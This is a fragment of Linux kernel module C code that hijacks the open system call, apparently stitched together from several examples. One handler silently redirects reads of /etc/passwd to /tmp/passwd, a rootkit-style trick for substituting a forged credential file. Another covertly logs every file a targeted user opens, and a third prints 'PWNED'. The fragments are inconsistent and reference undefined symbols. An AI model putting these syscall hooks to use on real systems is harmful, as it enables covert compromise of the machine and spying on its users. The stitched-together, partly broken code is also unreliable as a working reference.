//Define our new sneaky version of the 'open' syscall
asmlinkage int sneaky_sys_open(const char *pathname, int flags)
{
if (strstr(pathname, "/etc/passwd") != NULL) {
char replace[] = "/tmp/passwd";
copy_to_user((void *)pathname, &replace, sizeof(replace));
return original_call(pathname, flags);
} else {
//printk(KERN_INFO "Very, very Sneaky!\n");
return original_call(pathname, flags);
}
}
/*
* The function we'll replace sys_open (the function
* called when you call the open system call) with. To
* find the exact prototype, with the number and type
* of arguments, we find the original function first
* (it's at fs/open.c).
*
* In theory, this means that we're tied to the
* current version of the kernel. In practice, the
* system calls almost never change (it would wreck havoc
* and require programs to be recompiled, since the system
* calls are the interface between the kernel and the
* processes).
*/
asmlinkage int our_sys_open(const char *filename, int flags, int mode)
{
int i = 0;
char ch;
/*
* Check if this is the user we're spying on
*/
if (uid == current->cred->uid.val) {
/*
* Report the file, if relevant
*/
printk("Opened file by %d: ", uid);
do {
get_user(ch, filename + i);
i++;
printk("%c", ch);
} while (ch != 0);
printk("\n");
}
printk(KERN_INFO "L5 syscall dump stack start.\n");
dump_stack();
printk(KERN_INFO "L5 syscall dump stack over.\n");
/*
* Call the original sys_open - otherwise, we lose
* the ability to open files
*/
return original_call(filename, flags, mode);
}
asmlinkage int sys_our_open(const char *filename, int flags, int mode){
printk("<0>open system call\n");
return (original_call(filename, flags, mode));
}
static asmlinkage int hijacker_sys_open(const char* file, int flags, int mode)
{
printk(MODULE_NAME ": PWNED\n");
return original_call(file, flags, mode);
}
